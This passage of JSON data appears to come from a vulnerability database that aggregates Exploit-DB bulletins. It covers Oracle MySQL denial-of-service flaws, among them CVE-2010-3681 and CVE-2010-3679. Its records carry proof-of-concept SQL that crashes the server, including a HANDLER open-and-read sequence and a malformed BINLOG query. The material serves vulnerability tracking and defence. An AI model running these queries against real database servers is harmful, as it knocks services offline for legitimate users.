storage_engine=MYISAM;\r\n\r\nmysql> CREATE TEMPORARY TABLE mk_upgrade AS SELECT IF( NULL IS NOT NULL, NULL\r\n, NULL) ; drop table mk_upgrade;\r\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/34505/"}, {"lastseen": "2016-02-03T23:24:53", "osvdbidlist": ["69000"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "Oracle MySQL 5.1.48 'HANDLER' interface Denial Of Service Vulnerability. CVE-2010-3681. Dos exploit for linux platform", "reporter": "Matthias Leich", "published": "2010-08-20T00:00:00", "type": "exploitdb", "title": "Oracle MySQL <= 5.1.48 - 'HANDLER' interface Denial Of Service Vulnerability", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3681"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2010-08-20T00:00:00", "id": "EDB-ID:34520", "href": "https://www.exploit-db.com/exploits/34520/", "sourceData": "source: http://www.securityfocus.com/bid/42633/info\r\n\r\nMySQL is prone to a denial-of-service vulnerability.\r\n\r\nAn attacker can exploit this issue to crash the database, denying access to legitimate users.\r\n\r\nThis issue affects versions prior to MySQL 5.1.49.\r\n\r\nNOTE: This issue was previously covered in BID 42586 (Oracle MySQL Prior to 5.1.49 Multiple Denial Of Service Vulnerabilities) but has been assigned its own record to better document it.. \r\n\r\n--disable_warnings\r\nDROP TABLE IF EXISTS t1;\r\n--enable_warnings\r\nCREATE TABLE t1 ( pk INT , PRIMARY KEY (pk));\r\nHANDLER t1 OPEN AS handler_a;\r\nHANDLER handler_a READ FIRST;\r\nHANDLER handler_a READ `PRIMARY` NEXT;\r\n\r\nDROP TABLE t1;\r\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/34520/"}, {"lastseen": "2016-02-03T23:25:03", "osvdbidlist": ["67380"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "Oracle MySQL Prior to 5.1.49 Malformed 'BINLOG' Arguments Denial Of Service Vulnerability. CVE-2010-3679. Dos exploit for linux platform", "reporter": "Shane Bester", "published": "2010-08-20T00:00:00", "type": "exploitdb", "title": "Oracle MySQL < 5.1.49 - Malformed 'BINLOG' Arguments Denial Of Service Vulnerability", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3679"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2010-08-20T00:00:00", "id": "EDB-ID:34521", "href": "https://www.exploit-db.com/exploits/34521/", "sourceData": "source: http://www.securityfocus.com/bid/42638/info\r\n\r\nMySQL is prone to a denial-of-service vulnerability.\r\n\r\nAn attacker can exploit this issue to crash the database, denying access to legitimate users.\r\n\r\nVersions prior to MySQL 5.1.49 are vulnerable. \r\n\r\nThe following example query is available:\r\n\r\nmysql> BINLOG '-2079193929'; ", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/34521/"}]}